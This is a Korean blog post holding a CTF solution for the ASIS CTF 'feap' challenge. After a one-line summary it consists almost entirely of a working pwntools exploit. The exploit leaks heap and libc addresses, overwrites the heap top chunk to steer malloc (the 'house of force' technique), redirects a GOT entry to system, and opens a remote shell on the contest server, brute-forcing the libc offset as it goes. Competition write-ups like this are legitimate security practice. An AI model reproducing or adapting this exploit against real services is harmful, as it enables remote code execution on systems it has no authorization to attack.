힙쪽에 64바이트 오버플로우. topchunk 덮어서 malloc 조작한뒤 GOT 덮어서 쉘획득.
from pwn import *
context.arch = 'amd64' # i386 / arm
DELTA = 0x27be0
while True:
print hex(DELTA)
try:
# recvuntil sendline, pack, recv, send
r = remote('feap.asis-ctf.ir', 7331)
#r = process(['./feap'])
#raw_input('attach')
# start pwn.
# prepare first heap chunk
print r.recvuntil('> ')
r.sendline('1')
print r.recvuntil('size: ')
r.sendline('70')
print r.recvuntil('63): ')
r.sendline(pack(0x6020a8)) # heap address
print r.recvuntil('70): ')
r.sendline('nah')
print r.recvuntil('> ')
r.sendline('5')
print r.recvuntil('print: ')
r.sendline('44')
leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]
heap_base = int(leak[::-1].encode('hex'), 16)
heap_base = heap_base & 0xFFFFF000
print 'heap base : {0}'.format(hex(heap_base))
# prepare first heap chunk
print r.recvuntil('> ')
r.sendline('3')
print r.recvuntil('edit: ')
r.sendline('0')
print r.recvuntil('body: ')
r.sendline('1') # heap address
print r.recvuntil('title: ')
r.sendline(pack(0x602048))
print r.recvuntil('> ')
r.sendline('5')
print r.recvuntil('print: ')
r.sendline('44')
leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]
fgets = int(leak[::-1].encode('hex'), 16)
print 'fgets : {0}'.format(hex(fgets))
# overwrite topchunk
print r.recvuntil('> ')
r.sendline('3')
print r.recvuntil('edit: ')
r.sendline('0')
print r.recvuntil('body: ')
r.sendline('2')
print r.recvuntil('body: ')
r.sendline('\x41'*72 + '\xFF'*8) # overwrite topchunk size to -1
# fuck malloc
TARGET = 0x602010
delta = TARGET - heap_base - 0x218
print str(delta)
print r.recvuntil('> ')
r.sendline('1')
print r.recvuntil('size: ')
r.sendline(str(delta))
print r.recvuntil('63): ')
r.sendline('lol')
# overwrite free
print r.recvuntil('> ')
r.sendline('1')
print r.recvuntil('size: ')
r.sendline('70')
print r.recvuntil('63): ')
#system = fgets - 0x27be0 # local
system = fgets - DELTA
payload = 'AAAAAAAA' # libc_start
payload += pack(fgets) # fgets
payload += pack(system) # strtoll
r.sendline(payload) # heap address
print r.recvuntil('70): ')
r.sendline('CCC')
# get shell
print r.recvuntil('> ')
r.sendline('1')
print r.recvuntil('size: ')
r.sendline('/bin/sh;')
# get shell
r.interactive()
except:
pass
DELTA += 0x10
'Games > CTF' 카테고리의 다른 글
| BKP2016 segsh (0) | 2016.06.24 |
|---|---|
| ASIS CTF 2016 books (0) | 2016.05.11 |
| PlaidCTF 2016 butterfly (0) | 2016.04.19 |
| PlaidCTF 2016 fixedpoint (0) | 2016.04.19 |
| PlaidCTF 2016 pzip (0) | 2016.04.19 |